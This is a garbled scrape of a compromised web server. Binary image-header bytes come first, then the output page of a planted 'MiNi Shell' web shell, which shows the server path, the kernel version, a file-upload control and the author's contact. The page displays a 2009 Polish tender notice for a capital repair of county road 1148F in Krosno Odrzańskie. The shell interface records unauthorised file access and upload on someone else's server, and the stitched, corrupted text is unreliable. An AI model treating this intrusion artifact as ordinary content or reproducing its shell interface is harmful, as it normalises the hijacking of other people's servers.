JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090113/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090113/13141-N-2009.html

<p class="kh_header"><b>Krosno Odrzańskie: Remont kapitalny drogi powiatowej nr 1148F na odcinku od skrzyżowania z drogą krajową nr 29 do skrzyżowania z drogą krajową nr 32 - w km od 0+025 do 3+490</b><br>
<b>Numer ogłoszenia: 13141 - 2009; data zamieszczenia: 13.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Fryderyka Chopina 5, 66-600 Krosno Odrzańskie, woj. lubuskie, tel. 068 3836098, faks 068 3836098.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pow.krosno-odrz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont kapitalny drogi powiatowej nr 1148F na odcinku od skrzyżowania z drogą krajową nr 29 do skrzyżowania z drogą krajową nr 32 - w km od 0+025 do 3+490.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych, polegających na remoncie kapitalnym  drogi powiatowej Nr 1148F na odcinku od skrzyżowania z drogą krajową nr 29 do skrzyżowania z drogą krajową nr 32 - w km od 0+025 do 3+490.

Przedmiot zamówienia obejmuje:

I. ROBOTY PRZYGOTOWAWCZE I ROZBIÓRKOWE
1. Rozbiórka nawierzchni chodnika z płytek betonowych 35x35x5 (z tego 534,50 m2 to materiał przeznaczony do ponownego wbudowania - poz. 38, natomiast pozostała ilość, czyli 1.261,09 m2 stanowi własność Wykonawcy i podlega wywiezieniu - poz. 6)	- 1 795,59 m2
2. Rozbiórka nawierzchni chodnika z betonowej kostki brukowej grubości 6 cm na podsypce piaskowej - materiał z rozbiórki stanowi własność Inwestora i jest przeznaczony do ponownego wbudowania - poz. 37)	- 29,0 m2
3. Rozbiórka krawężników betonowych o wymiarach 15x30 na podsypce piaskowej	- 1 385,0 mb
4. Rozbiórka obrzeży betonowych o wymiarach 6x25 na podsypce piaskowej (z tego 536,0 mb to materiał przeznaczony do ponownego wbudowania - poz. 27, natomiast pozostała ilość, czyli 824 mb stanowi własność Wykonawcy i podlega wywiezieniu - poz. 6)	- 1 360,0 mb
5. Regulacja pionowa studzienek dla urządzeń podziemnych - studzienki telekomunikacyjne	- 16 szt.

6. Wywóz materiału z rozbiórki (płytki chodnikowe +obrzeża + krawężniki betonowe) na koszt Wykonawcy. Materiał z rozbiórki stanowi własność Wykonawcy	- 144,27 m3
7. Rozbiórka poręczy ochronnych rurowych	- 58,0 mb
8. Rozbiórka nawierzchni na zjazdach z betonu o grubości 12 cm	- 63,0 m2
9. Rozbiórka nawierzchni na zjazdach z betonowej kostki brukowej grubości 8 cm. Materiał stanowi własność Inwestora i jest przeznaczony do ponownego wbudowania - poz. 40)	- 45,0 m2
10. Rozbiórka nawierzchni na zjazdach z płytek betonowych 50x50x7	- 38,85 m2
11. Rozbiórka nawierzchni na zjazdach z płytek betonowych o wymiarach 35x35x5	- 16,50 m2
12. Rozbiórka nawierzchni na zjazdach z brukowca	- 13,50 m2
13. Rozbiórka nawierzchni na zjazdach z trylinki betonowej o grubości 18 cm na podsypce piaskowej
	- 84,0 m2
14. Wywóz materiału z rozbiórki (trylinka + płytki chodnikowe + beton + brukowiec) na koszt Wykonawcy. Materiał z rozbiórki stanowi własność Wykonawcy
	- 30,54 m3
15. Rozbiórka nawierzchni bitumicznej  przy grubości średnio 3cm (wykonanie wcięcia) 	- 451,0 m2
16. Wykonanie cięcia nawierzchni bitumicznej na głębokość do 10 cm- 1 568,0 mb
17. Rozbiórka nawierzchni bitumicznej na głębokość do 10 cm (pod ściek przykrawężnikowy) 1 568,0 mb x 0,20 m 	- 313,60 m2
18. Frezowanie nawierzchni bitumicznej na głębokość średnio 5 cm, wraz z transportem materiału pochodzącego z rozbiórki, na miejsce wskazane przez Inwestora  na odl. do 4 km. Materiał pochodzący z rozbiórki stanowi własność Inwestora 	- 2 730,0 m2
19, Wywóz masy asfaltowej pochodzącej z rozbiórki nawierzchni asfaltowej na koszt Wykonawcy. Materiał z rozbiórki stanowi własność Wykonawcy - 112,16 m3
20. Rozbiórka barier betonowych (zakopianki) 	- 570,0 mb
21. Wywóz barier betonowych pochodzących z rozbiórki na koszt Wykonawcy. Materiał z rozbiórki stanowi własność Wykonawcy	- 66,0 m3

II. ELEMENTY ULIC
22. Wykonanie rowków pod krawężniki betonowe o wymiarach 30x30 w gruncie kat. I-II	- 1 385,0 mb
23. Wykonanie ławy betonowej pod krawężniki betonowe z oporem (1 385,0 mb x 0,0575 m3/mb)	- 79,64 m3
24. Ustawienie krawężników betonowych o wymiarach 15x30 na podsypce cementowo- piaskowej	- 1 385,0 mb
25. Wykonanie rowków pod obrzeża betonowe o wymiarach 20x20 w gr. kat. I-II	- 1 404,0 mb
26. Ustawienie obrzeży betonowych o wymiarach 6x25 na podsypce piaskowej	- 868,0 mb
27. Ustawienie obrzeży betonowych o wymiarach 6x25 na podsypce piaskowej - materiał z odzysku	- 536,0 mb

III. PODBUDOWY
28. Wykonanie koryta na zjazdach w gruncie kat. I- IV na głębokość do 20 cm             	- 260,85 m2
29. Transport urobku z koryta na koszt Wykonawcy - urobek stanowi własność Wykonawcy (260,85 m2 x 0,2 m)	- 52,17 m3
30. Wykonanie podbudowy z kruszywa łamanego na zjazdach gr. 15 cm	- 260,85 m2
31. Oczyszczenie istniejącej nawierzchni bitumicznej	- 1 330,0 m2
32. Skropienie istniejącej nawierzchni bitumicznej emulsją asfaltową w ilości 0,50 kg/m2 	- 21 202,0 m2
33. Ręczne profilowanie istniejącej nawierzchni masą mineralno - asfaltową	- 55,0 t
34. Mechaniczne profilowanie istniejącej nawierzchni masą mineralno - asfaltową
21 202,0 m2 x 0,035 t/m2	- 742,07 t

IV. NAWIERZCHNIA
35. Wykonanie warstwy ścieralnej z masy mineralno-asfaltowej o grubości 4 cm (łącznie ze zjazdami 1 252,7 m2)	- 22 454,70 m2
36. Wykonanie nawierzchni chodnika z betonowej kostki brukowej gr. 6 cm na podsypce piaskowej 	- 1 277,59 m2
37. Wykonanie nawierzchni chodnika z betonowej kostki brukowej gr. 6 cm na podsypce piaskowej - materiał z odzysku	- 29,0 m2
38. Wykonanie nawierzchni chodnika z płytek betonowych 35x35x5 na podsypce piaskowej - materiał z odzysku	- 534,50 m2
39. Wykonanie nawierzchni na zjazdach z betonowej kostki brukowej gr. 8 cm na podsypce cementowo- piaskowej	- 215,85 m2
40. Wykonanie nawierzchni na zjazdach z betonowej kostki brukowej gr. 8 cm na podsypce cementowo- piaskowej - materiał z odzysku	- 45,0 m2

V. URZĄDZENIA BEZPIECZEŃSTWA RUCHU
41. Wykonanie poręczy ochronnych, sztywnych z pochwytem i przeciągiem z rur stalowych o średnicy 60 i 30 mm, przy rozstawie słupków z rur stalowych o średnicy 60 mm, co 1,5 m	- 58,0 mb
42. Ustawienie barier ochronnych, stalowych, jednostronnych, SP-06 - 506,0 mb
43. Ustawienie zakończeń barier ochronnych stalowych jednostronnych, SP-06	- 64,0 mb

VI. ODWODNIENIE
44. Regulacja pionowa studzienek dla urządzeń podziemnych - włazy kanałowe	- 20 szt.
45. Regulacja pionowa studzienek dla urządzeń podziemnych - zawory wodne 	- 17 szt.
46. Regulacja pionowa studzienek dla urządzeń podziemnych - kratki ściekowe, uliczne	- 4 szt.
47. Wymiana osadników betonowych wpustów ulicznych na nowe (średnica 500) 	- 10 szt.
48. Ułożenie ścieków ulicznych z betonowej kostki brukowej grubości 8 cm na podsypce cementowo - piaskowej	- 1 568,0 mb

VII. OZNAKOWANIE POZIOME
49. Odnowienie przejść dla pieszych masą termoutwardzalną - oznakowanie grubowarstwowe	- 68,0 m2
50. Odnowienie linii segregacyjnych i krawędziowych, ciągłych masą termoutwardzalną - oznakowanie grubowarstwowe	- 126,72 m2
51. Odnowienie linii segregacyjnych i krawędziowych, przerywanych masą termoutwardzalną - oznakowanie grubowarstwowe	- 511,68 m2

VIII. ROBOTY WYKOŃCZENIOWE
52. Uzupełnienie poboczy gruntowych warstwą humusu o grubości do 5 cm, wraz z obsianiem, (w cenie należy uwzględnić zakup oraz transport materiału do miejsca wbudowania)	- 2 940,8 m2

UWAGA: Wykonawca zobowiązany jest przedstawić Zamawiającemu przed rozpoczęciem robót zatwierdzony projekt tymczasowej organizacji ruchu i zabezpieczenia robót sporządzony zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 roku w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. Nr 177 poz. 1729)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający wymogi art. 22 ust. 1 pkt. 1-4 ustawy Prawo zamówień publicznych, w szczególności: 
1)posiadają uprawnienia do wykonywania działalności związanej z budową dróg kołowych;
2)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych;
3)posiadają niezbędną wiedzę i doświadczenie. O zamówienie mogą ubiegać się Wykonawcy, którzy w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowali z należytą starannością przynajmniej jedną robotę zbliżoną zakresem do robót objętych przedmiotem zamówienia, czyli związaną z budową, przebudową lub remontem drogi (w tym roboty bitumiczne), o wartości wykonanych robót nie mniejszej niż 1.590.000,00 zł;
4)dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. O zamówienie może się ubiegać Wykonawca, który dysponuje lub będzie dysponował osobą posiadającą uprawnienia do realizacji zamówienia tj. kierownikiem budowy, który posiada uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej drogowej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, wpisaną na listę członków właściwej izby samorządu zawodowego i posiadającą ważne, wymagane ubezpieczenie od odpowiedzialności cywilnej;
5)dysponują potencjałem technicznym, czyli narzędziami i urządzeniami niezbędnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego, tj.:
- mechaniczną zamiatarką do nawierzchni			- 1 szt.;
- frezarką drogową						- 1 szt.;
- skrapiarką do bitumu					- 1 szt.;
- układarką mas bitumicznych (z podgrzewaną ławą)		- 1 szt.;
- zagęszczarką wibracyjną					- 1 szt.;
- walcem stalowym gładkim					- 1 szt.;
- walcem ogumionym					- 1 szt.;
- malowarką samojezdną do oznakowania poziomego		- 1 szt.;
- samochodem ciężarowym o ładowności od 5 do 15 ton		- 4 szt.;
- samochodem ciężarowym o ładowności od 15 do 25 ton		- 6 szt.
6)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca winien posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, w tym działalności zgodnej z przedmiotem zamówienia, na równowartość co najmniej 1.590.000,00 zł;
7)złożą formularz ofertowy wraz z wymaganymi dokumentami, oświadczeniami, załącznikami oraz zaświadczeniami;
8)spełniają wymagania określone ustawą - Prawo zamówień publicznych oraz niniejszą specyfikacją.

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonych dokumentów i oświadczeń wskazanych w Specyfikacji Istotnych Warunków Zamówienia, zgodnie z zasadą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawca jest zobowiązany przedłożyć:
1)Uzupełniony formularz oferty;
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
2)Oświadczenie Wykonawcy o możliwości ubiegania się o udzielenie zamówienia na podstawie art. 22 ustawy Prawo zamówień publicznych;
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy  z Wykonawców składających ofertę wspólną.
3)Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie;
W przypadku składania oferty wspólnej ww. wykaz składają ci z Wykonawców składających ofertę wspólną, którzy potwierdzają spełnienie warunku. Warunek zostanie uznany przez Zamawiającego za spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie.
4)Wypełnioną i podpisaną kartę gwarancyjną;
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
5)Uzupełniony formularz, informujący o tej części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom, z podaniem nazw (firm) proponowanych podwykonawców;
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
6)Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia,  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
W przypadku:
a)wskazania przez Wykonawcę w niniejszym wykazie osoby, którą będzie on dysponował, należy załączyć pisemne zobowiązanie innego podmiotu do udostępnienia osoby zdolnej do wykonania zamówienia;
b)składania oferty wspólnej Wykonawcy składają jeden wspólny wykaz kadry.
7)Wykaz  niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca.
W przypadku:
a)gdy Wykonawca wskaże w niniejszym wykazie narzędzia i urządzenia, którymi będzie dysponował, należy załączyć pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń;
b)składania oferty wspólnej należy złożyć jeden dokument.
8)Uzupełniony kosztorys ofertowy;
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
9)Podpisany wzór umowy;
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
10)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że profil działalności Wykonawcy odpowiada przedmiotowi zamówienia, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną. 
11)Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - tj. kserokopię uprawnień do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej drogowej lub odpowiadających im ważnych uprawnień budowlanych wydanych na podstawie wcześniej obowiązujących przepisów oraz aktualne zaświadczenia o przynależności tych osób do właściwej izby samorządu zawodowego i posiadaniu ważnego, wymaganego ubezpieczenia od odpowiedzialności cywilnej;
12)Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
W przypadku składania oferty wspólnej ww. dokumenty składa każdy z Wykonawców składających ofertę wspólną.  
2.Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert.    
3.Wykonawcy zagraniczni. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt. 1 ppkt. 10) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Przedmiotowy dokument lub dokumenty winny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przedmiotowy dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.Oferty wspólne. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie przedmiotowego zamówienia albo reprezentowania ich w niniejszym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo, z którego powinien wynikać zakres umocowania dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy załączyć do oferty. Wszelka korespondencja między Zamawiającym a Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia będzie kierowana do ustanowionego pełnomocnika ze skutkiem dla mocodawców.
6.Przed podpisaniem umowy (w przypadku wygrania przetargu) Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum regulującą współpracę tych Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip-zdpkrosnoodrz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych 
ul. Fryderyka Chopina 5
66-600 Krosno Odrzańskie
Dział Techniczno - Ekonomiczny.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2009 godzina 10:00, miejsce: Zarząd Dróg Powiatowych 
ul. Fryderyka Chopina 5
66-600 Krosno Odrzańskie
Dział Techniczno - Ekonomiczny.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com